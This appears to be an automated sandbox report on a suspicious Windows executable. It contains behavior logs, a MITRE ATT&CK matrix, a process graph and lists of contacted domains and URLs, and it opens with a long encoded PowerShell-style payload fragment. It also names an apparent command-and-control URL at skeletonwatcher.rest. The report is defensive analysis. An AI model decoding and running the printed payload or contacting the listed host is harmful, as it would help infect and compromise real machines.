gboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablaekaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmayJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exeQueries volume information: C:\WindowsTasks\Platform VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		12
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts22
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Disable or Modify Tools      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell      		Logon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets22
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Obfuscated Files or Information      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583221 Sample: dGhlYXB0Z3JvdXA=-free.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 72 37 skeletonwatcher.rest 2->37 39 raw.githubusercontent.com 2->39 45 Malicious sample detected (through community Yara rule) 2->45 47 Yara detected Powershell decode and execute 2->47 49 Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet 2->49 51 2 other signatures 2->51 9 dGhlYXB0Z3JvdXA=-free.exe 6 2->9         started        signatures3 process4 dnsIp5 41 raw.githubusercontent.com 185.199.110.133, 443, 49214 FASTLYUS Netherlands 9->41 43 skeletonwatcher.rest 188.114.97.3, 49285, 80 CLOUDFLARENETUS European Union 9->43 53 Encrypted powershell cmdline option found 9->53 13 powershell.exe 22 9->13         started        16 powershell.exe 9->16         started        18 WMIC.exe 1 9->18         started        20 conhost.exe 9->20         started        signatures6 process7 file8 35 C:\Users\user\AppData\...\at4aznwk.cmdline, Unicode 13->35 dropped 22 csc.exe 3 13->22         started        25 csc.exe 3 16->25         started        process9 file10 31 C:\Users\user\AppData\Local\...\at4aznwk.dll, PE32 22->31 dropped 27 cvtres.exe 1 22->27         started        33 C:\Users\user\AppData\Local\...\f2b3v2t5.dll, PE32 25->33 dropped 29 cvtres.exe 1 25->29         started        process11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      dGhlYXB0Z3JvdXA=-free.exe0%ReversingLabs
      dGhlYXB0Z3JvdXA=-free.exe0%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://dom.spec.whatwg.org/#get-the-parent0%Avira URL Cloudsafe
      https://streams.spec.whatwg.org/0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#concept-headers-append0%Avira URL Cloudsafe
      https://url.spec.whatwg.org/#port-state0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#concept-network-error0%Avira URL Cloudsafe
      https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke0%Avira URL Cloudsafe
      http://skeletonwatcher.rest/api/get/free60%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#concept-headers-fill0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#forbidden-response-header-name0%Avira URL Cloudsafe
      https://dom.spec.whatwg.org/#concept-event-listener-invoke0%Avira URL Cloudsafe
      https://w3c.github.io/permissions/#permissionstatus0%Avira URL Cloudsafe
      https://dom.spec.whatwg.org/#retarget0%Avira URL Cloudsafe
      https://w3c.github.io/permissions/#permission-descriptor0%Avira URL Cloudsafe
      https://dl.deno.land/canary/0%Avira URL Cloudsafe
      https://crbug.com/v8/8520turbo_fast_api_callsenable0%Avira URL Cloudsafe
      https://w3c.github.io/permissions/#status-of-a-permission0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#body-mixin0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#concept-heade0%Avira URL Cloudsafe
      https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.0%Avira URL Cloudsafe
      http://skeletonwatcher.rest/api/get/freeM0%Avira URL Cloudsafe
      https://w3c.github.io/FileAPI/0%Avira URL Cloudsafe
      https://url.spec.whatwg.org/#idna0%Avira URL Cloudsafe
      https://dom.spec.whatwg.org/#concept-event-path-append0%Avira URL Cloudsafe
      https://wicg.github.io/import-maps/0%Avira URL Cloudsafe
      https://dl.deno.land/canary-latest.txt0%Avira URL Cloudsafe
      https://w3c.github.io/user-timing)0%Avira URL Cloudsafe
      https://dom.spec.whatwg.org/#event-path0%Avira URL Cloudsafe
      https://some/file.ts0%Avira URL Cloudsafe
      https://dl.deno.land/canary/P0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#concept-construct-readablestream0%Avira URL Cloudsafe
      https://fetch.spec.whatwg.org/#dom-headers0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      skeletonwatcher.rest
      		188.114.97.3
      		truefalse
        		unknown
        raw.githubusercontent.com
        		185.199.110.133
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://skeletonwatcher.rest/api/get/free6dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354926565.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360169025.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357338443.000001639157A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.rapidtables.com/convert/color/hsl-to-rgb.htmldGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://fetch.spec.whatwg.org/#concept-headers-appenddGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://dom.spec.whatwg.org/#concept-event-listener-inner-invokedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://deno.land/std/examples/colors.tsGeneratedGhlYXB0Z3JvdXA=-free.exefalse
              		high
              https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://url.spec.whatwg.org/#special-schemedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://fetch.spec.whatwg.org/#forbidden-response-header-namedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fetch.spec.whatwg.org/#concept-network-errordGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://url.spec.whatwg.org/#port-statedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fetch.spec.whatwg.org/#concept-headers-filldGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/denoland/deno/issuesdGhlYXB0Z3JvdXA=-free.exefalse
                    		high
                    https://streams.spec.whatwg.org/dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fetch.spec.whatwg.org/#ref-for-dom-body-formdatadGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/beatgammit/base64-jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://deno.land/x/example/types.d.tsdGhlYXB0Z3JvdXA=-free.exefalse
                        		high
                        https://deno.land/std/fmt/colors.tsdGhlYXB0Z3JvdXA=-free.exefalse
                          		high
                          https://console.spec.whatwg.org/#console-namespacedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://no-color.org/dGhlYXB0Z3JvdXA=-free.exefalse
                              		high
                              https://www.npmjs.com/package/tslib).dGhlYXB0Z3JvdXA=-free.exefalse
                                		high
                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/InstancdGhlYXB0Z3JvdXA=-free.exefalse
                                  		high
                                  https://dom.spec.whatwg.org/#get-the-parentdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://w3c.github.io/permissions/#permissionstatusdGhlYXB0Z3JvdXA=-free.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://deno.land/x/dGhlYXB0Z3JvdXA=-free.exefalse
                                    		high
                                    https://dom.spec.whatwg.org/#concept-event-listener-invokedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2259938507.00000254C8F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2259938507.00000254C8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C3901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpfalse
                                        		high
                                        https://crbug.com/v8/8520turbo_fast_api_callsenabledGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScopedGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://deno.land/manual/runtime/compiler_apis#denobundle).dGhlYXB0Z3JvdXA=-free.exefalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2234723049.00000254B8D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380006000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/bitinn/node-fetch/blob/master/src/headers.jsdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErrdGhlYXB0Z3JvdXA=-free.exefalse
                                                  		high
                                                  https://w3c.github.io/permissions/#status-of-a-permissiondGhlYXB0Z3JvdXA=-free.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://developer.mozilla.org/)dGhlYXB0Z3JvdXA=-free.exefalse
                                                    		high
                                                    https://dl.deno.land/canary/dGhlYXB0Z3JvdXA=-free.exefalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://fetch.spec.whatwg.org/#body-mixindGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/inexorabletash/text-encodingdGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://go.micropowershell.exe, 00000003.00000002.2234723049.00000254B99B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://w3c.github.io/permissions/#permission-descriptordGhlYXB0Z3JvdXA=-free.exefalse
